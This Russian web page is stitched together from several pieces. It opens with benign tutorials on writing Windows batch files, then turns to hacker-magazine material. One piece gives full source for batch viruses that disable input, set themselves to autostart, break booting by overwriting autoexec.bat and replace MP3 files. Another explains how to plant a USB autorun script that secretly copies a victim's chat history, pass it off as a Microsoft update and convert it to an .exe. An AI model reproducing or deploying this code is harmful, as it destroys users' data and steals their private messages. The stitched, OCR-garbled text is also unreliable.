Написание bat файлов — примеры батников. Bat файлы, примеры Готовые бат файлы

Использование графического интерфейса в операционных системах сегодня представляется чем-то само собой разумеющимся и совершенно естественным, но так было не всегда. Первая операционная система MS DOS, разработанная компанией Microsoft, не имела GUI, а управление выполнялось посредством ввода текстовых команд. С тех пор минуло без малого 40 лет, однако скриптовый язык командной строки по-прежнему пользуется популярностью, причём не только в среде разработчиков.

Командная строка не столь удобна, зато с её помощью можно выполнять недоступны из GUI операции. С другой стороны, запускать каждый раз консоль, вводить в неё одну за другой команды – всё это сильно замедляет работу. Впрочем, можно существенно упростить задачу, создав бат-файл или попросту батник – текстовый файл с расширением BAT, содержащий список инструкций, обрабатываемых командным интерпретатором CMD. Используются такие файлы для автоматизации разных задач, например, для удаления временных файлов по расписанию или запуска программ.

Как создать файл с расширением BAT

Итак, как создать bat-файл в Windows 7/10? Очень просто. Для этого понадобится любой текстовый редактор и знание основ командной строки. Можно использовать Блокнот, а ещё лучше Notepad++, так как последний имеет подсветку синтаксиса. Создайте в редакторе новый файл, в меню «Файл» выберите «Сохранить как», дайте будущему скрипту имя, а в выпадающем списке «Тип файла» выберите «Batch file (*bat; *cmd; *nt)».

Если для создания bat-файла захотите использовать Блокнот, расширение нужно присвоить вручную, а в списке «Тип файла» выбрать «Все файлы».

Как видите, создать файл с расширением bat не составляет сложности, есть тут, однако, свои тонкости. В командных файлах нельзя использовать перенос строк, кодировка bat-файла должна быть выставлена UTF-8, если в теле скрипта используется кириллица, кодировку нужно изменить, вставив в положенном месте команду chcp 1251.

Вместо расширения BAT можно использовать CMD, результат выполнения скрипта будет точно таким же.

Основные команды, синтаксис и примеры использования батников

Как сделать bat-файл вы знаете, теперь настала пора самого интересного, а именно синтаксиса языка интерпретатора CMD. Понятно, пустой батник работать не будет, он даже не запустится при двойном по нему клике. Чтобы скрипт сработал, в нём должна быть прописана хотя бы одна команда. Для наглядного примера посмотрим, как написать bat-файл для запуска программ. Допустим, приступая к работе, вы каждый раз запускаете три программы – Chrome, Firefox и VLC. Упростим задачу, создав скрипт, который будет сам запускать эти программы с интервалом в пять секунд.

Открываем пустой батник и вставляем в него такие команды:

Start "" "C:/Program Files/Google/Chrome/Application/chrome.exe" timeout /t 05 start "" "C:/Program Files/Mozilla Firefox/firefox.exe" timeout /t 05 start "" "C:/Program Files/VideoLAN/VLC/vlc.exe"

Команда start запускает исполняемый файл нужной программы, а команда timeout /t задаёт интервал между запусками. Обратите внимание на расположение кавычек – в них берутся пути, в которых имеются пробелы. Также если в пути есть кириллические символы, в начало скрипта следует вставить изменяющую кодировку команду chcp 1251 , в противном случае интерпретатор не сможет правильно прочитать путь.

При запуске скрипта будет последовательно открыто четыре окна консоли, это нормальное явление, по выполнении команд все они автоматически закроются, впрочем, можно сделать так, чтобы открывалось только первое окно. Для этого код запуска приложения следует изменить следующим образом:

Start /b "" "путь"

Может также статься, что в определённый момент потребуется приостановить выполнение скрипта, чтобы пользователь сам смог решить, выполнять ли все остальные команды или нет. Для этого существует команда pause . Попробуйте заменить ею timeout и увидите, что получится.

Start /b "" "путь" pause

Рассмотрим ещё один пример команд для bat файла. Напишем скрипт, который будет в одном случае выключать компьютер, а в другом – перезагружать его. Для этих целей мы будем использовать команду shutdown с параметрами /s , /r и /t . При желании можно добавить в батник запрос на выполнение действия, вот так:

@echo off chcp 1251 echo "Вы действительно хотите выключить компьютер?" pause shutdown /s /t 0

Поясняем. Первая команда скрывает текст самих команд, вторая – устанавливает кириллическую кодировку, третья – выводит сообщение для пользователя, четвертая – устанавливает паузу, пятая – выключает, а с ключом /r вместо /s перезагружает компьютер без традиционной задержки в одну минуту. Если не желаете церемониться с запросами и паузами, можете оставить только пятую команду.

Если вместо русского текста при выполнении команды вы увидите крякозябры, попробуйте преобразовать файл скрипта в ANSI.

Что ещё можно делать с помощью скриптов? Много чего, например, удалять, копировать или перемещать файлы. Допустим, у вас есть некая папка data в корне диска D, содержимое которой нужно очистить одним махом. Открываем батник и вставляем в него такую команду:

Del /A /F /Q "D:/data"

А можно и так:

Forfiles /p "D:/data" /s /m *.* /c "cmd /c Del @path"

В отличие от первой, вторая команда удаляет файлы рекурсивно, то есть в папке data будут удалены все файлы плюс те, которые лежат во вложенных каталогах.

А вот ещё один полезный пример. Напишем скрипт, который будет создавать резервную копию содержимого одной папки и сохранять данные в другую. За копирование отвечает команда robocopy :

Robocopy C:/data D:/backup /e pause

Запустив такой батник на исполнение, вы скопируете все содержимое папки data в папку backup, включая вложенные каталоги, пустые и с файлами. К слову, команда robocopy имеет много параметров, позволяющих очень гибко настраивать параметры копирования.

Запуск bat-файлов от имени администратора и по расписанию, скрытый запуск bat

Теперь вы знаете как создавать батники и имеете некое общее представление о языке интерпретатора CMD. Это были основы, теперь пришла пора познакомиться с некоторыми полезными особенностями работы с bat-файлами. Известно, что для выполнения некоторых действий программам нужны права администратора. Понадобиться они могут и батникам. Самый очевидный способ запустить скрипт от имени администратора, это кликнуть по нему правой кнопкой мыши и выбрать в контекстном меню соответствующую опцию.

Кроме того, можно сделать так, что конкретный батник будет запускаться с повышенными привилегиями всегда. Для этого необходимо создать на такой скрипт обычный ярлык, открыть его свойства, нажать кнопку «Дополнительно» и отметить в открывшемся окошке галочкой пункт «Запуск от имени администратора». Этот способ хорош ещё тем, что позволяет выбрать для ярлыка любой значок, тогда как файл с расширением BAT или CMD всегда будет иметь невзрачный вид.

Скрипты, как и все приложения, можно запускать по расписанию. Команда timeout /t здесь не совсем уместна, для отложенного запуска лучше всего использовать встроенный «Планировщик задач» Windows. Здесь всё просто. Открываем командой taskschd.msc Планировщик, определяемся с триггером, действие выбираем «Запустить программу» и указываем путь к bat-файлу. Вот и всё, скрипт будет запущен в положенное время.

И напоследок ещё один интересный момент. Когда вы запускаете bat-файл, на экране появляется, пусть даже на какую-то долю секунды, окно командной строки. А нельзя ли сделать так, чтобы скрипт выполнялся в скрытом режиме? Можно, причём несколькими способами. Самый простой заключается в следующем. Создаём на bat-файл ярлык, открываем его свойства и в меню «Окно» выбираем «Свёрнутое в значок». После этого единственным видимым признаком запуска скрипта будет появление значка CMD на панели задач, окон же при этом открываться не будет.

Если вы желаете полностью скрыть выполнение скрипта, можете воспользоваться «костылем» – скриптом VВS, который будет запускать ваш батник в скрытом режиме. Текст скрипта приведен ниже, сохраните его в файл hidden.vbs , предварительно заменив путь во второй строчке кода D:/sсript.bat путём к вашему батнику.

Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "D:\script.bat" & Chr(34), 0 Set WshShell = Nothing

Есть также и другие варианты, например, использование утилиты Hidden Start , позволяющей запускать исполняемые и пакетные файлы в скрытом режиме, в том числе без приглашения .

А на этом пока всё. Информацию касательно создания скриптов BAT без труда можно найти в интернете. Неплохо также ознакомиться с учебником Уильяма Станека «Командная строка Microsoft Windows». Несмотря на то, что с момента издания книги прошло более десяти лет, содержащаяся в ней информация до сих пор актуальна.

Алексей Комолов (С.-Петербург)

Я уже как-то писал статью о bat-вирусах. В данной статье я хочу рассказать о самих bat-файлах и о том, что они собой представляют.

Пакетные, или batch-файлы, — это обычные текстовые файлы, содержащие наборы команд интерпретатора и имеющие расширение *.bat или *.cmd (*.cmd работают только в ОС семейства NT). Редактировать такие файлы можно при помощи обычного Блокнота либо любого другого текстового редактора.

Ниже я опишу некоторые примеры применения, которые проверил в Windows 2000. Кое-какие из этих примеров работают и в Windows 9x.

Начнем с создания самого bat-файла. Для этого создайте новый текстовый документ в Блокноте, откройте его и напечатайте в нем две следующих строки:

@echo This batch file

Затем выберите меню Файл > Сохранить как, выберите Тип файла > Все файлы, в поле “Имя файла” введите имя файла с расширением – например, 1.bat — и сохраните его, допустим, в корне диска С. Теперь откройте диск С и запустите созданный вами файл. На экран будет высветится окно со словами:

This batch file

Нажмите любую клавишу для продолжения…

После нажатия вами любой клавиши окно закроется, так как bat-файл выполнен.

Обратите внимание на символ “собаки” (@), стоящий перед каждой строкой. Этот символ в bat-файле указывает на то, что саму команду выводить на экран не надо, а нужно вывести только результат ее работы.

В качестве эксперимента вы можете открыть этот файл Блокнотом и удалить символ “собаки” из начала каждой строки, сохраните и запустите полученный *.bat-файл – результат вы увидите сразу.

Итак, вы умеете создавать bat-файлы. Но их надо снабдить некими командами, чтобы они что-либо делали. Для этого войдите в меню Пуск > Выполнить и введите в появившемся окне команду cmd (для Windows семейства NT) или command (для Windows 9x) – у вас откроется командная строка, в которой введите команду:

И вы увидите список доступных команд, которые вы сможете использовать, с краткими описаниями к ним.

Если же вам нужно будет более подробное описание по какой-либо конкретной команде, то введите в командной строке

help имя_команды

Например, чтобы получить подробную справку по ключам команды AT, введите такую команду:

В итоге на экране появится список ключей для запуска команды AT из bat файла.

Если же ваш bat-файл исполняется под управлением Windows, а не в чистом DOS, то из него можно запускать любые приложения или открывать файлы. Например, если вам нужно автоматически открыть лог-файл работы bat-файла по завершении его работы, то для этого достаточно включить в bat-файл последней строкой такую команду:

start имя_файла.txt

В результате выполнения откроется файл имя_файла.txt, а сам *.bat-файл завершит свою работу. Такой способ хорош в том случае, если лог-файл небольшого размера, иначе Блокнот откажется его открывать, предложив использовать WordPad. Но и это проблему можно будет решить (о чем я напишу ниже, в других примерах).

Автозапуск bat-файлов

Довольно часто возникает необходимость автоматического запуска bat-файлов для выполнения ими рутинных операций.

Для автозапуска bat-файлов по расписанию наиболее подходит Планировщик, входящий в стандартную поставку операционной системы Windows. С его помощью можно очень гибко настроить запуск пакетного файла в определенные дни или часы, с определенным интервалом. Также можно создать несколько расписаний и т.д.

Для локального запуска bat-файлов можно воспользоваться программами от сторонних фирм.

bat-файлы также могут использоваться как логин-скрипты в доменах. При этом они будут исполняться при каждом входе пользователя в сеть не смотря на его желание.

С их помощью можно автоматизировать сбор информации о машинах или о программном обеспечении, установленном на компьютерах пользователей, принудительно менять настройки Windows, устанавливать незаметно для пользователя программное обеспечение и автоматизировать решение других задач, ручное исполнение которых заняло бы очень много времени.

Создание файла с произвольным именем с помощью bat-файла.

Для создания файла в процессе выполнения пакетного файла используется символ перенаправления, который выглядит так >

То бишь, чтобы создать файл, нужно перенаправить поток данных с экрана в файл. Сделать это можно при помощи следующей команды:

@echo Start file>C:\1.txt

После выполнения этой команды в корне диска С:/ будет создан текстовый файл со строкой Start file.

Также при создании файла в его имени можно использовать системные переменные или их части. Например, можно создать файл-отчет о работе bat-файла с именем, равным дате запуска этого bat-файла. Для этого нужно использовать следующие строки в bat-файле:

set datetemp=%date:~-10%

@echo .>%SYSTEMDRIVE%\%DATETEMP%.txt

Немного поясню, как работают эти две строки.

Сначала в памяти создаем переменную datetemp, которой присваиваются 10 символов справа налево от системной переменной DATE. Теперь во временной переменной datetemp содержится только текущая дата.

Следующей строкой мы перенаправляем вывод символа “точка” в файл, имя которого берем из переменной datetemp, а расширение *.txt указываем явно. Файл будет создан на системном диске компьютера, где выполняется bat-файл.

Предположим, что вы – системный администратор и вам надо собрать информацию о компьютерах в сети. А чтобы знать, к какому компьютеру относятся те или иные данные, было бы удобнее добавить к собранной информации имя компьютера. Это можно сделать с помощью следующей команды:

@echo .>C:\FolderName\%COMPUTERNAME%.txt

Данная команда в ходе выполнения пакетного файла создаст на диске С:/ текстовый файл с именем того компьютера, на котором выполняется пакетный файл.

Для создания файла с определенным именем можно использовать любые системные переменные, либо создать свои, на основе системных переменных и (или) других данных.

Создание папки с помощью bat-файла.

Для создания папки с помощью bat-файла используется либо команда MKDIR, либо ее сокращенный аналог MD. Выглядит эта команда так:

MD FolderName

После выполнения такой команды будет создана папка FolderName в папке, откуда запущен сам bat-файл.

Для того чтобы создать файл в другом месте, например, в корне диска D:/, используйте в команде полный путь к тому месту, где будет располагаться эта папка. В данном случае команда будет выглядеть так:

MD D:\FolderName

Также при создании папок можно пользоваться системными переменными. Например, можно создать в корне диска D:/ папку с именем текущего пользователя. Для этого используется переменная %USERNAME%. Сама команда будет выглядеть следующим образом:

MD D:\%USERNAME%

Но можно еще более усложнить команду и создать папку с именем текущего пользователя на системном диске его компьютера. Эта команда будет выглядеть так:

MD %SYSTEMDRIVE%\%USERNAME%

Также при создании папок или файлов можно использовать любые системные переменные или их части. Например, ниже приведена команда для создания на системном диске компьютера пользователя папки с именем в виде текущей дате:

set datetemp=%date:~-10%

MD %SYSTEMDRIVE%\%datetemp%

Этот пример работает следующим образом: первая команда создает в памяти переменную datetemp, которая будет уничтожена по окончании работы bat-файла. То бишь тех пор, пока bat-файл не закончил свою работу, у вас будет возможность оперировать со значением этой переменной. Переменной datetemp присваивается 10 символов справа налево от системной переменной DATE, то есть от текущей даты.

Переменная DATE имеет формат ДН ДД.ММ.ГГГГ. Первые символы слева — имя дня недели, поэтому их можно смело отбросить и присвоить временной переменной datetemp только текущую дату.

Также вы можете оперировать переменными так, как вам будет удобно, создавая папки с уникальными, легко читаемыми и удобными для вас названиями.

Получить же список всех переменных можно при помощи команды SET.

Перенаправление результата выполнения команд в файл.

При выполнении сложного bat-файла в автоматическом режиме довольно часто возникают сложности, связанные с проверкой результатов его работы, что связанно многими причинами. Поэтому проще записывать результаты работы команд *.bat-файла в отдельный текстовый лог-файл, а потом анализировать правильность работы *.bat-файла по записанному логу и при необходимости регулировать работу этого самого bat-файла.

Перенаправить результат работы команд *.bat-файла в лог-файл можно с помощью следующего кода:

@echo off

echo Start %time%

echo Create test.txt

echo test>C:\test.txt

echo Copy Test.txt to Old_test.txt

copy C:\test.txt C:\Old_test.txt

echo Stop %time%

Ниже я опишу, что означают строки в этом коде.

Первая строка отключает вывод самих команд. Таким образом, в лог-файл будут записаны только результаты их выполнения.

Вторая строка записывает в лог-файл время начала работы пакетного файла.

Третья строка записывает в лог-файл пояснение того, что следующая команда создаст файл test.txt

Четвертая срока создает файл test.txt с корне диска С:/. Данный файл создается для примера – вы можете назвать его по-другому и разместить в другом месте. Эта же команда записывает в файл C:\test.txt слово test.

Пятая строка выводит в лог-файл пояснение, что следующая команда выполняет копирование файла из одного места в другое.

Шестая строка копирует созданный файл C:\test.txt в файл C:\Old_test.txt, т.е. создается копия файла под новым именем.

Ну и, наконец, последняя, седьмая, строка содержит команду вывода времени завершения работы пакетного файла. В сумме с записью в лог-файл времени начала работы пакетного файла эти два значения времени дают возможность оценить время работы пакетного файла.

Сохраните этот пакетный файл под любым именем — например, log.bat.

У вас может возникнуть такая ситуация, что вам будет необходимо, чтобы отчет о работе пакетного файла сохранялся в отдельной папке и каждый день записывался отчет с новым именем файла, чтобы потом у вас была возможность в любой из дней обратиться к логам за предыдущие дни. И, допустим, имя лог-файла должно быть в виде даты работы пакетного файла.

Чтобы все это реализовать, создайте, например, на диске С:/ папку с именем LOG, то бишь полный путь к ней будет выглядеть в *.bat-файле как C:\LOG. Созданный пакетный файл log.bat будеnзапускатьcя такой командой:

log.bat>C:\LOG\%date~-10%.txt

Если пакетный файл будет запускаться из Планировщика, то нужно указать полный путь с *.bat-файлу. Помните, что если в пути есть пробелы, то надо использовать либо кавычки, либо формат 8.3. Т.е., если путь к bat-файлу выглядит, например, как C:\Program Files\1.bat, то в командной строке Планировщика для запуска bat-файла будет выглядеть либо так:

«C:\Program Files\1.bat»>C:\LOG\%date~-10%.txt

Либо вот так:

C:\Progra~1\1.bat>C:\LOG\%date~-10%.txt

Вы можете использовать любую из команд, которая вам больше нравится, так как они обозначают фактически одно и то же, просто пишутся немного по-разному.

После запуска файла log.bat в папке C:\LOG будет создан файл с именем в виде даты запуска bat-файла, например, 09.10.2010.txt. Этот текстовый файл и будет отчетом о работе пакетного файла log.bat.

Запуск bat-файла, пример которого я написал в начале данного раздела, указанной выше командой, приведет к созданию лог-файла такого содержания:

Start 19:03:27,20

Create test.txt

Copy Test.txt to Old_test.txt

Скопировано файлов: 1.

Stop 19:03:27,21

Итак, для выполнения перенаправления результатов работы bat-файла в лог-файл нужно использовать символ перенаправления >. Синтаксис команды такой:

Путь\ИмяФайла.bat>Путь\ИмяЛогФайла.txt

В принципе, расширение лог-файла может быть практически любым. При желании, отчет о выполнении пакетного задания можно оформить даже в виде html-страницы — соответствующие теги могут быть выведены в лог-файл так, как выводились комментарии в примере log.bat — и скопировать его, допустим, на корпоративный сервер.

Автоматический ответ на запрос о подтверждении.

Некоторые команды при выполнении требуют подтверждения потенциально опасного действия. Например, такие команды как format или del, которые уничтожают файлы на носителях, предварительно запрашивают подтверждение для дальнейшего выполнения удаления файла(ов) либо для форматирования носителя информации.

Если одна из этих команд выполняется в пакетном файле, то запрос на подтверждение остановит выполнение пакетного файла и он будет ожидать от пользователя выбора одного из нескольких предложенных вариантов (обычно это 2 варианта — согласие на продолжение выполнения команды либо отказ и завершение команды).

А вот если результат выполнение пакетного файла перенаправлен в лог-файл, то пользователь не увидит запроса на подтверждение и bat-файл будет выглядеть зависшим.

Для исправления подобных неприятностей можно перенаправить нужный ответ в команду, то есть выполнить обратное действие для перенаправления вывода результатов работы команды в файл.

Покажу на конкретном примере, как выглядит запрос на подтверждение потенциально опасного действия. Создайте, например, на диске С:/, папку с именем, например, Papka. Потом создайте в ней (либо скопируйте в нее) два любых файла (например, 2 картинки). Затем откройте командную строку и выполните такую команду:

del C:\Papka

Эта команда должна удалить все файлы из указанной папки. Но перед тем, как все удалить, вам будет выдан запрос для подтверждения следующего содержания:

C:\Papka\*, Продолжить ?

Команда не будет выполняться до тех пор, пока не будет нажата либо клавиша Y (подтверждение удаления файлов), либо клавиша N (выход из программы без удаления файлов). При выполнении пакетного файла в автоматическом режиме его исполнение остановится.

Чтобы избежать этого, используйте перенаправление. Перенаправление осуществляется при помощи символа “вертикальная черта” (|). Эта вертикальная черта говорит программе о том, что вместо вывода символа на экран его надо “отдать” следующей за символом команде.

Проверить работу перенаправления можно с помощью выполнения в командной строке следующую команду:

echo Y|del C:\Papka

На экране будет показан запрос на подтверждение удаления всех файлов в папке Papka, но уже сразу с положительным ответом (Y). Все файлы из папки Papka будут удалены.

Но будьте осторожны с этой командой, дабы не навредить себе и не удалить нужные вам файлы.

Продолжение в следующем номере

Привет тебе снова, юный кодер-шкодер. Если ты читал прошлую мою статью под названием "Учим ДОС", то ничего сложного тут для тебя не будет. А если не читал, то внимательно смотри комментарии. Итак, начнем. Сижу я однажды и думаю: а не накатать ли мне вирус? А так как кроме QБарсика я ничего не знал, а ДОС был моим вторым... [Братом], а ты что подумал извращенец? :)~. ТО я решил писать вирус на нем, и оказалось это не так трудно.

Вот тело моего первого вируса

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER

deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js

pause
cls

Объясняю популярно и по шагам:

1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system - Копируемся в папку windows/system
// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini
7 label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER"
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe"
//в новый файл autoexec.bat
11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls - Выходим

Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать "Вы ламер." .Работает только в винде до 2000.

@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку:)
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER....=[_H@CKED_BY_*_"SmallPox_Vir_Org"_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. А теперь необходимо перезагрузиться"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls

А теперь, что-то новое.

@echo off
cls
echo Please wait, updating system...
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto:end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music

cd My_Music
//Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection:)) Virus //Прощальные строки
cls //Выход.

ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
" Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY >
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo >
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo >
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход

О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего;).Ну удачи тебе в написании вирей, а я отклонюсь и свалю пить пиво %-).

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Батник - это обычный тексто-вый файл, содержащий наборы команд интерпретатора и имею-щий расширение .bat или .cmd ! (.cmd работают только в ОС се-мейства NT). Редактировать та-кие файлы можно при помощи блокнота "Или любого другого текстового редактора.

Пишем батник

Создавать,батник будем для второй ситуации (она не-много сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:

Echo off - скрывает ви-зуальный процесс копиро-вания.

C:\Program Files\QIP\Users - папка, в которой находится история.

f:\rar.exe а -г users > nul -запуск архиватора для ус-корения копирования.

copy users.rar g:\adc > nu l - адрес куда копируем.

del users.rar > nul - удаляет созданный архив на жеском диске.

Не всегда бывает известна бук-ва флеш-диска. В "таком случае прописываем несколько вариан-тов (один уж точно угадаем):

chdit C:\Program Files\QIP\Users

f:\rar.exe а -г users > nul

copy users.rar e:\abc > nul

g:\rar.exe a -r users > nul

copy users.rar g:\abc > nul

h:\rar.exe a -r users > nul

copy users.rar h:\abc > nul

del users-rar > nul

Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расши-рение c .txt нa .bat. Это мож-но сделать в Total Commander"e.

Создаем автозапуск

Теперь надо сделать так, что-бы батник автоматически запускался с флешки при под-ключении к компьютеру. Для это-го создаём новый текстовый до-кумент и пишем в нём:

ShellExeCute="xxx.bat"

Сохраняем файл и переимено-вываем его на autorun.inf .

Делаем архив

Из папки с WinRAR (по умолча-нию C:\Program Files\WinRAR бе-рём файлик rar.exe . Создаём в корне флешки папку с именем abc . Также, в корень флешки бро-саем остальные три файла (xxx.bat, autorun.inf, rar.exe ).

Все файлы скрываем от посто-ронних глаз (правой кнопкой мы-ши вызываем Меню на файле > Свойства > Скрытый . Это всё. Отдаём флешку "жертве" и ждём результата.

Социальная инженерия

Не обязательно делать авто-запуск. "Жертва" сама мо-жет запустить батник. Для этого надо воспользоваться социаль-ной инженерией. Например, со-общаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстро-действие и без-опасность опера-ционной системы. Устанавливать об-новление нужно то-лько с флешки. Можете сами придумать причи-ну, по которой на-до запустить наш батник. Всё зави-сит от вашей фан-тазии и смекалки.

Превращаем.bat в.exe

Для большей "безопаснос-ти" neperoним.bat в.ехе (вдруг"жертва" знакома с напи-санием батников). В этом нам поможет небольшая програм-мка ExeScript v3.0 .

Скачать можноэдесь: http://uploadbox.com/fMes/c8d5a60af9/ (размер 3.51. Мб). В окне программы жмём иконку с чистым листом и выбираем Batch file (bat) или File > New > Batch file (bat) . В по-явившемся окне пишем наш "текст".

Теперь укажем для на-шего ехе-шника подхо-дящую иконку. В окне Properties щёлкаем на поле Custom Icon и вы-бираем заранееприготовленную иконку. Далее нажима-ем F7 или Project > Build . Всё, ехе-шник готов.

